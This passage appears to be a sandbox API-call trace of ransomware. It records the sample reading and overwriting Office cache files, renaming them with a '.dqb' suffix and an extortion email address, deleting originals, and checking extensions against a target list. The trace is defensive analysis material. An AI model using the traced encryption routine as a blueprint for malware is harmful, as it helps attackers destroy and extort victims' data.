lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.654] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0042.654] WriteFile (in: hFile=0x1a4, lpBuffer=0x3ef2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2068*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.656] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ef2068 | out: hHeap=0x570000) returned 1 [0042.656] CloseHandle (hObject=0x1a4) returned 1 [0042.656] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0042.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.657] lstrlenW (lpString=".doc") returned 4 [0042.657] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.657] lstrlenW (lpString=".docx") returned 5 [0042.657] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.657] lstrlenW (lpString=".pdf") returned 4 [0042.657] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.657] lstrlenW (lpString=".xls") returned 4 [0042.657] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.657] lstrlenW (lpString=".xlsx") returned 5 [0042.657] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.657] lstrlenW (lpString=".ppt") returned 4 [0042.657] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.657] lstrlenW (lpString=".zip") returned 4 [0042.657] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.657] lstrlenW (lpString=".rar") returned 4 [0042.657] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.657] lstrlenW (lpString=".bz2") returned 4 [0042.657] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.657] lstrlenW (lpString=".7z") returned 3 [0042.657] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.657] lstrlenW (lpString=".dbf") returned 4 [0042.657] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.657] lstrlenW (lpString=".1cd") returned 4 [0042.657] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.657] lstrlenW (lpString=".jpg") returned 4 [0042.657] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.658] lstrlenW (lpString=".doc") returned 4 [0042.658] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.658] lstrlenW (lpString=".docx") returned 5 [0042.658] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.658] lstrlenW (lpString=".pdf") returned 4 [0042.658] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.658] lstrlenW (lpString=".xls") returned 4 [0042.658] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.658] lstrlenW (lpString=".xlsx") returned 5 [0042.658] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.658] lstrlenW (lpString=".ppt") returned 4 [0042.658] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.658] lstrlenW (lpString=".zip") returned 4 [0042.658] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.658] lstrlenW (lpString=".rar") returned 4 [0042.658] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.658] lstrlenW (lpString=".bz2") returned 4 [0042.658] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.658] lstrlenW (lpString=".7z") returned 3 [0042.658] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.658] lstrlenW (lpString=".dbf") returned 4 [0042.658] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.658] lstrlenW (lpString=".1cd") returned 4 [0042.658] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.659] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.659] lstrlenW (lpString=".jpg") returned 4 [0042.659] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.659] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0042.659] lstrlenW (lpString="ProjLR.cab") returned 10 [0042.659] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0042.984] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=8265165) returned 1 [0042.984] CloseHandle (hObject=0x184) returned 1 [0042.984] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab")) returned 0x2020 [0042.984] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.984] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0042.985] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0042.985] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0042.985] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0042.985] ReadFile (in: hFile=0x184, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.025] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0043.025] ReadFile (in: hFile=0x184, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.033] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0043.033] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0043.033] ReadFile (in: hFile=0x184, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.056] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.056] WriteFile (in: hFile=0x184, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0043.298] SetEndOfFile (hFile=0x184) returned 1 [0043.298] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3ef2068 [0043.301] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0043.301] WriteFile (in: hFile=0x184, lpBuffer=0x3ef2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2068*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.303] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0043.303] WriteFile (in: hFile=0x184, lpBuffer=0x3ef2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2068*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.305] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0043.305] WriteFile (in: hFile=0x184, lpBuffer=0x3ef2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2068*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.307] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ef2068 | out: hHeap=0x570000) returned 1 [0043.307] CloseHandle (hObject=0x184) returned 1 [0043.307] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0043.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0043.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0043.307] lstrlenW (lpString=".doc") returned 4 [0043.307] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.307] lstrlenW (lpString=".docx") returned 5 [0043.307] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0043.307] lstrlenW (lpString=".pdf") returned 4 [0043.307] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.307] lstrlenW (lpString=".xls") returned 4 [0043.307] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.307] lstrlenW (lpString=".xlsx") returned 5 [0043.307] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0043.307] lstrlenW (lpString=".ppt") returned 4 [0043.307] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0043.307] lstrlenW (lpString=".zip") returned 4 [0043.308] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.308] lstrlenW (lpString=".rar") returned 4 [0043.308] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.308] lstrlenW (lpString=".bz2") returned 4 [0043.308] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.308] lstrlenW (lpString=".7z") returned 3 [0043.308] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.308] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0043.308] lstrlenW (lpString=".dbf") returned 4 [0043.308] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.308] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0043.308] lstrlenW (lpString=".1cd") returned 4 [0043.308] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.308] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0043.308] lstrlenW (lpString=".jpg") returned 4 [0043.308] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.308] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0043.308] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0043.308] lstrlenW (lpString=".doc") returned 4 [0043.308] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.308] lstrlenW (lpString=".docx") returned 5 [0043.308] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0043.308] lstrlenW (lpString=".pdf") returned 4 [0043.308] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.308] lstrlenW (lpString=".xls") returned 4 [0043.308] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.308] lstrlenW (lpString=".xlsx") returned 5 [0043.308] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0043.308] lstrlenW (lpString=".ppt") returned 4 [0043.308] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.308] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0043.308] lstrlenW (lpString=".zip") returned 4 [0043.308] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.308] lstrlenW (lpString=".rar") returned 4 [0043.308] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.309] lstrlenW (lpString=".bz2") returned 4 [0043.309] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.309] lstrlenW (lpString=".7z") returned 3 [0043.309] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0043.309] lstrlenW (lpString=".dbf") returned 4 [0043.309] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0043.309] lstrlenW (lpString=".1cd") returned 4 [0043.309] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0043.309] lstrlenW (lpString=".jpg") returned 4 [0043.309] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.309] lstrcmpiW (lpString1=".EXE", lpString2=".dqb") returned 1 [0043.309] lstrlenW (lpString="DW20.EXE") returned 8 [0043.309] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.563] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=838536) returned 1 [0043.563] CloseHandle (hObject=0x1dc) returned 1 [0043.563] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 0x2020 [0043.563] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.563] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.574] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.574] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.574] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0043.575] GetLastError () returned 0x0 [0043.575] ReadFile (in: hFile=0x1dc, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0xccb88, lpOverlapped=0x0) returned 1 [0043.617] WriteFile (in: hFile=0x160, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xccb90, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xccb90, lpOverlapped=0x0) returned 1 [0043.630] ReadFile (in: hFile=0x1dc, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0043.630] WriteFile (in: hFile=0x160, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xe4, lpOverlapped=0x0) returned 1 [0043.630] SetEndOfFile (hFile=0x160) returned 1 [0044.314] CloseHandle (hObject=0x160) returned 1 [0044.492] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.500] SetEndOfFile (hFile=0x1dc) returned 1 [0044.557] CloseHandle (hObject=0x1dc) returned 1 [0044.557] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0044.557] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 1 [0044.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0044.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0044.557] lstrlenW (lpString=".doc") returned 4 [0044.557] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0044.557] lstrlenW (lpString=".docx") returned 5 [0044.557] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0044.557] lstrlenW (lpString=".pdf") returned 4 [0044.557] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0044.557] lstrlenW (lpString=".xls") returned 4 [0044.557] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0044.557] lstrlenW (lpString=".xlsx") returned 5 [0044.558] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0044.558] lstrlenW (lpString=".ppt") returned 4 [0044.558] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0044.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0044.558] lstrlenW (lpString=".zip") returned 4 [0044.558] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0044.558] lstrlenW (lpString=".rar") returned 4 [0044.558] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0044.558] lstrlenW (lpString=".bz2") returned 4 [0044.558] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0044.558] lstrlenW (lpString=".7z") returned 3 [0044.558] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0044.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0044.558] lstrlenW (lpString=".dbf") returned 4 [0044.558] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0044.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0044.558] lstrlenW (lpString=".1cd") returned 4 [0044.558] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0044.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0044.558] lstrlenW (lpString=".jpg") returned 4 [0044.558] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0044.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0044.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0044.558] lstrlenW (lpString=".doc") returned 4 [0044.558] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0044.558] lstrlenW (lpString=".docx") returned 5 [0044.558] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0044.558] lstrlenW (lpString=".pdf") returned 4 [0044.558] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0044.558] lstrlenW (lpString=".xls") returned 4 [0044.558] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0044.558] lstrlenW (lpString=".xlsx") returned 5 [0044.558] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0044.558] lstrlenW (lpString=".ppt") returned 4 [0044.558] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0044.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0044.559] lstrlenW (lpString=".zip") returned 4 [0044.559] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0044.559] lstrlenW (lpString=".rar") returned 4 [0044.559] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0044.559] lstrlenW (lpString=".bz2") returned 4 [0044.559] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0044.559] lstrlenW (lpString=".7z") returned 3 [0044.559] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0044.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0044.559] lstrlenW (lpString=".dbf") returned 4 [0044.559] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0044.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0044.559] lstrlenW (lpString=".1cd") returned 4 [0044.559] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0044.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0044.559] lstrlenW (lpString=".jpg") returned 4 [0044.559] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0044.559] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0044.559] lstrlenW (lpString="OfficeMUI.msi") returned 13 [0044.559] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0044.559] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=3702272) returned 1 [0044.559] CloseHandle (hObject=0x1dc) returned 1 [0044.559] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi")) returned 0x2020 [0044.560] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all 